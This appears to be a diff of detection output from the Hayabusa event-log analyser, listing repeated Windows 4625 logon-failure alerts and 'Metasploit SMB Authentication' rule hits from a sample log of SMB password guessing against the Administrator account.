+2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uweLaLhvznDee1IF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oNQcS2BonF12ikiX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D43Flf2keSL3aph6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zw7nJXNHZ2QNa3In  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UZp4567BIWAwxF9r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9iVvPuykq62pV9z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRVomETC34InuKPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VpHfjKgAxChSYz8R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tIbTy5IDRy90lbUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mM6Olq0zYkMlwmrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUehtGEh0EqRHiLP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhZ2KHmCTonGrXSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZea5qiet7vrT3iv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNWY8kuJMSy8h0Zk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bt9DUQ0mwhkJlTt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zXYtsM2MMuNSYtVr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgzvsdMN2SU7Knlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxiBYXNCY32yNb6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVfJmOxvsp75g3a0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHp1hlHjD8w3WKt3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEeJWAJgOeueYSM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tOfPGoUXu932L80d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NbH4R6GK1PIVT3ij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgsJokRd07Nh1lO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 11ylyxQyV5HCJ18g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Am2qI1ya4wYdqErV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2AmZsYUYmDpWZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c0Hd8xWxOxFifJBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlh64Gtfoig2uzOY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LtK8Hj2kf3dfFSnW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VKUPqxtNqkVqXgTg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SKSxp87CBg8L8wSi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CpvxvR0ftQs1gdEF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9RGDzNMt9fM6rLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvOO9NLhbbKJXQq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mDB9bIx7LcoJ6IAU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfJWsGqlQTmFUUPT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9PRIO3MASsjrdQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9QCn4nZHB0ENeA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4iUNHB1gE2d1dBfZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tM3IdtrLdVXQjOjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dbmn9Er9e1JZZybc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SY40ARcAoo9cWQIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fc7m0blzidQfn1BU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13SkGPbDDXou7qLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YIlJeZpJlvcKgqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
